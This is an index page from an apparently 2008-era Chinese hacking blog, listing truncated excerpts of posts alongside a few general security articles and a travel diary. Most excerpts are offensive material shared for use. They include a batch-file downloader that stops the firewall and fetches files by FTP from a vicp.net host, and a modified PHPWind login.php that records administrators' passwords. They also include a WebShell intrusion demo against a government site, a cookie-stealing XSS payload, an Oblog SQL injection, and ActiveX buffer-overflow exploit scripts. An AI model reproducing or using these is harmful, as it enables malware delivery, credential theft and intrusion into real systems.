• 2008-08-19

    ActiveX技术安全报告 - [安全资讯]

    今年年初至今,多款著名软件相继爆出安全漏洞,这些安全漏洞都和ActiveX技术有紧密的关系。那么到底是ActiveX技术本身存在问题,还是这些应用软件自身在编写时就先天不足呢?   今年年初至今,多款著名软件相继爆出安全漏洞,这些安全漏洞都和ActiveX技术有紧密的关系。那么到底是ActiveX技术本身存在问题,还是这些应用软件自身在编写时就先天不足呢?下文将给你详尽的解答。

      西汉的萧何是汉高祖刘邦的重要谋臣,他曾向刘邦推荐了善于用兵打仗的韩信,使之为汉朝的建立立下汗马功...
    Tag:ActiveX技术
    3exxp-0day 发表于08:41:10 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-19

    批处理制作下载器 - [网络攻防]

    今天自己搞出来个永远不会被杀的下载者
    好东西就要拿出来和大家分享,,,
    把制作过程告诉大家吧....
    step1
    先在桌面上单机右键,新建-快捷方式

    step2
    在项目位置里输入
    %windir%\system32\cmd.exe /c net stop sharedaccess&echo open XXXX.vicp.net > t.t&echo user>>t.t&echo...
    Tag:
    3exxp-0day 发表于08:40:37 | 阅读全文 | 评论 3 | 编辑 | 分享 0

  • 2008-08-19

    PHPWIND得到管理员密码的方法

    有站的权限,但是管理员密码很复杂,MD5暴不出来,想得到他密码咋办?
    在登录文件做手脚啊...我来贴一个我修改的.
    login.php里面替换掉对应的部分就OK了.

    [Copy to clipboard] [ - ]CODE:
    if($action=="login"){
    /*记录他的问题和答案修改开始*/
    $ques=($_POST['question']!=='-1') ? $_POST['question...
    Tag:PHPWIND管理员密码
    3exxp-0day 发表于08:40:02 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-19

    8月18号科讯科技0day入侵演示 - [网络攻防]

    现在程序在不断的发展,更新。漏洞也不断的出现。今天来给大家演示一下科讯的漏洞,简单拿大站的WebShell.在百度或者GOOGEL搜索,科讯的注册关键字,因为这个漏洞就出自于头像上传。关键字为(小提示:在输入用户名后,可以自动检查您想要的用户名是否已经被别人注册)   我们今天就拿第一个来演示,目标地址为(http://www.**.**.gov.cn) 图1

            

      因为...
    Tag:
    3exxp-0day 发表于08:39:16 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-19

    XSS攻击防御技术白皮书 - [安全资讯]

    XSS攻击:跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆。故将跨站脚本攻击缩写为XSS。XSS是一种经常出现在web应用中的计算机安全漏洞,它允许恶意web用户将代码植入到提供给其它用户使用的页面中。比如这些代码包括HTML代码和客户端脚本。攻击者利用XSS漏洞旁路掉访问控制——例如同源策略(same origin policy)。这种类型的漏洞由于被骇客用来编写危害性更大的ph...
    Tag:XSS攻击防御
    3exxp-0day 发表于08:38:48 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-19

    blogspot.com窃取cookie漏洞 - [exp'or'0day]

    Google的博客blogspot.com站点.
    支持html,然后可以在其中插入类似如下内容.获取cookie

    <a onblur="javascript:alert(document.cookie)" href="http://bp3.blogger.com/_er6f39OjAgE/RssqA2y7uNI/AAAAAAAAABk/BbeITZK9BAg/s1600-h/5af1scd.jpg"><img ...
    Tag:
    3exxp-0day 发表于08:38:05 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-18

    旅游结束了 - [本人小记]

     最近几天去了趟外地。 没有本本。所以只能拿我的小v8上网。

    很不和谐的说。  去外地玩了三天。散心去楼。 去了村庄。 风光很好。

     那里的人对我也很好。

       刚到家。, 就打开电话。  Blog人气太少了。 那是因为我好几天不能更新。

    从今天开始。 恢复正常楼~

    Tag:
    3exxp-0day 发表于19:03:32 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-18

    Oblog 4.6 User_Address.asp注入漏洞 - [exp'or'0day]

    漏洞文件User_Address.asp: If oblog.l_Group(17,0)=0 Then //第4行 有等级限制
    oblog.AddErrStr ("您目前所属的等级不允许使用通讯录功能")
    oblog.showUserErr
    Response.End
    End if
    。。。。。。
    addrId=Request("id") //第15行
    If addrId<>&quo...
    Tag:Oblog 4.6 漏洞
    3exxp-0day 发表于19:02:50 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-15

    Microsoft Visual Studio 'Msmask32.ocx' ActiveX控件缓冲区溢出漏洞 - [exp'or'0day]

    var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
    width="10"><PARAM NAME="Mask" VALUE="';
    var body1='"></OBJECT>';
    var buf='';
    for (i=1;i<=1945;i++){...
    Tag:
    3exxp-0day 发表于10:36:06 | 阅读全文 | 评论 0 | 编辑 | 分享 0

  • 2008-08-14

    JComSoft AniGIF.ocx ActiveX控件多个栈溢出漏洞 - [exp'or'0day]

    Animation GIF ActiveX控件(anigif.ocx)用于在OLE容器中显示GIF文件。

    anigif.ocx控件没有正确地验证对ReadGIF和ReadGIF2方式所传送的输入参数,如果用户受骗访问了恶意网页并向上述方式传送了超长参数的话,就可以触发栈溢出,导致执行任意指令。 <* 参考 Guido Landi*>测试方法:[www.sebug.net]
    以下程序(方法)可能带有攻击性,仅供安全研究与教学之用.风险自负!<html&...
    Tag:
    3exxp-0day 发表于07:00:46 | 阅读全文 | 评论 0 | 编辑 | 分享 0
共33页 第一页 上一页 3 4 5 6 7 8 9 10 11 12 下一页 最后一页